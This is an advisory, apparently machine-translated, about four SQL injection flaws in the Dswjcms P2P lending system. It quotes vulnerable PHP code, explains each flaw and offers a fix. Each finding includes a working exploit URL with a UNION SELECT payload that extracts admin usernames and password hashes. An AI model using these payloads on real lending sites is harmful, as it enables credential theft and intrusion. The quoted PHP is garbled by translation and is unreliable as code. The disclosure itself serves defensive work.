Dswjcms P2P online lending system: four front-end SQL injections.
Reference case: the official website demo.
-------------------------------------------------------------------------------------
#1
/Lib/Action/Win/IndexAction.class.php
Public function loanAjax () {$ Borrowing = D ('borrowing '); import ('org. util. page '); // import paging class $ type = $ this-> _ param ('type') = 0? '':" Type = ". ($ this-> _ param ('type')-1); // loan type $ state = $ this-> _ param ('state') = 1? '(State = 1 or state = 10)': "state = ". ($ this-> _ param ('state'); // borrowing Status $ classify = $ this-> _ param ('classify ') = 0? '':" Way = ". ($ this-> _ param ('classify ')-1); // payment method $ scope = $ this-> _ param ('scope') = 0? '':" Candra = ". ($ this-> _ param ('scope ')-1); // loan term if ($ type | $ state | $ classify | $ scope) {$ type = $ type? $ Type. "and": ''; $ state = $ state? $ State. "and": ''; $ scope = $ scope? $ Scope. "and": ''; $ classify = $ classify? $ Classify. "and": ''; $ where = $ type. $ state. $ scope. $ classify;} // $ where. = '(state = 1 or state = 10)'; $ where. = 'min> 1'; $ count = $ Borrowing-> where ($ where)-> count ();.........
The `type`, `state`, `classify` and `scope` parameters are all concatenated into the WHERE string. `type`, `classify` and `scope` have 1 subtracted from them first, which makes PHP evaluate them as numbers, but `state` is appended as `"state = " . value` whenever it is not 1, so its raw value reaches the SQL statement unescaped and the rest of the query can be spliced onto it.
Exp:
Win/Index/loanAjax.html?type=1&state=0) UNION SELECT 1,2,3,(select concat(username,0x5c,password) from ds_admin limit 1),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34%23&classify=1&scope=1
#2
/Lib/Action/Home/LoanAction.class.php
Public function loanAjax () {$ Borrowing = D ('borrowing '); import ('org. util. page '); // import paging class $ type = $ this-> _ param ('type') = 0? '':" Type = ". ($ this-> _ param ('type')-1); // loan type $ state = $ this-> _ param ('state') = 0? '(State = 1 or state = 10)': "state = ". ($ this-> _ param ('state'); // borrowing Status $ classify = $ this-> _ param ('classify ') = 0? '':" Way = ". ($ this-> _ param ('classify ')-1); // payment method $ scope = $ this-> _ param ('scope') = 0? '':" Candra = ". ($ this-> _ param ('scope ')-1); // loan term if ($ type | $ state | $ classify | $ scope) {$ type = $ type? $ Type. "and": ''; $ state = $ state? $ State. "and": ''; $ scope = $ scope? $ Scope. "and": ''; $ classify = $ classify? $ Classify. "and": ''; $ where = $ type. $ state. $ scope. $ classify;} // $ where. = '(state = 1 or state = 10)'; $ where. = 'min> 1'; $ count = $ Borrowing-> where ($ where)-> count ()
Same construction as #1: `type`, `classify` and `scope` are coerced to numbers by the `- 1`, but `state` is appended as `"state = " . value` whenever it is not 0, so its raw value is spliced into the SQL statement unescaped.
Exp:
Loan/loanAjax.html?type=1&state=1) UNION SELECT 1,2,3,(select concat(username,0x5c,password) from ds_admin limit 1),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34%23&classify=1&scope=1
#3
D:/wamp/www/Lib/Action/Home/LoanAction.class.php
Public function index () {$ Borrowing = D ('borrowing '); import ('org. util. page '); // import paging class $ where =' (state = 1 or state = 5 or state = 7 or state = 9 )'; if ($ this-> _ get ('search') {$ where. = "and 'title' LIKE '% ". $ this-> _ get ('search '). "% '";} $ count = $ Borrowing-> where ($ where)-> count (); // query the total number of records meeting the requirements $ Page = new Page ($ count, 10 ); // The total number of incoming records and the number of records displayed on each Page of the instantiated paging class $ show = $ Page-> show (); // display output by PAGE $ borrow = $ this-> borrow_unicoms ($ where, $ Page-> firstRow. ','. $ Page-> listRows, ''stick' DESC, 'time' DESC '); $ this-> assign ('borrow', $ borrow ); $ this-> assign ('page', $ show); // value-assigned paging output // Title, keyword, description $ Site = D ("Site "); $ site = $ Site-> field ('keyword, remark, title, link')-> where ('link = "'. $ _ SERVER ['request _ URI ']. '"')-> find (); $ this-> assign ('si', $ site); $ active ['loan'] = 'active '; $ this-> assign ('active', $ active); $ endjs = '// AJAX pagination $ this-> _ get ('search') receives the search parameter, however, tp The sample receiving parameter is only encoded in double quotation marks. It is enclosed in single quotation marks. Injection generation,
Loan.html?search=%27%29+UNION+SELECT+1%2C2%2C3%2C%28select+concat%28username%2C0x5c%2Cpassword%29+from+ds_admin+limit+1%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%2C33%2C34%23
#4
www/Lib/Action/Home/IndexAction.class.php
Public function index () {$ this-> copyright (); $ where = 'State = 1 or state = 5 or state = 7 or state = 9 '; $ borrow = $ this-> borrow_unicoms ($ where, '', ''stick' DESC, 'time' DESC '); $ this-> assign ('borrow ', $ borrow); // cumulative investment amount $ borrowing = M ('borrowing '); $ accumulate ['sum'] = $ borrowing-> where ('state'> 1')-> sum ('money '); // cumulative expected earnings $ money = M ('money '); $ accumulate ['benefit'] = $ money-> sum (''stay _ interest '+ 'make _ reward ''); $ this-> assign ('accessulate', $ accumulate); // News Center $ new = $ this-> someArticle (16,5); $ this-> assign ('new ', $ new); $ shuffling = M ('shuffling '); $ shufflings = $ shuffling-> field ('title, img, url ') -> order (''order'asc ')-> select (); $ this-> assign ('shuff', $ shufflings); $ head ="
";
$ This-> assign ('head', $ head );
// Title, keyword, and description
$ Site = D ("Site ");
$ Site = $ Site-> field ('keyword, remark, title, link')-> where ('link = "'. $ _ SERVER ['request _ URI ']. '"')-> find ();
`$_SERVER['REQUEST_URI']` is read straight from the superglobal, bypassing the framework's `_get`/`_param` input helpers, and is concatenated into the `link = "..."` condition, so the request URI itself is injectable. The same `link` lookup appears in the `index()` of #3.
Solution:
Filter the input instead of concatenating it into the SQL string: cast the numeric parameters (`type`, `state`, `classify`, `scope`) with `intval()` before building the condition, express the `search` and `link` lookups through the framework's array-form `where()` conditions rather than a hand-built `LIKE '%...%'` or `link = "..."` string, and compare `link` against a value the application derives itself rather than the raw `$_SERVER['REQUEST_URI']`.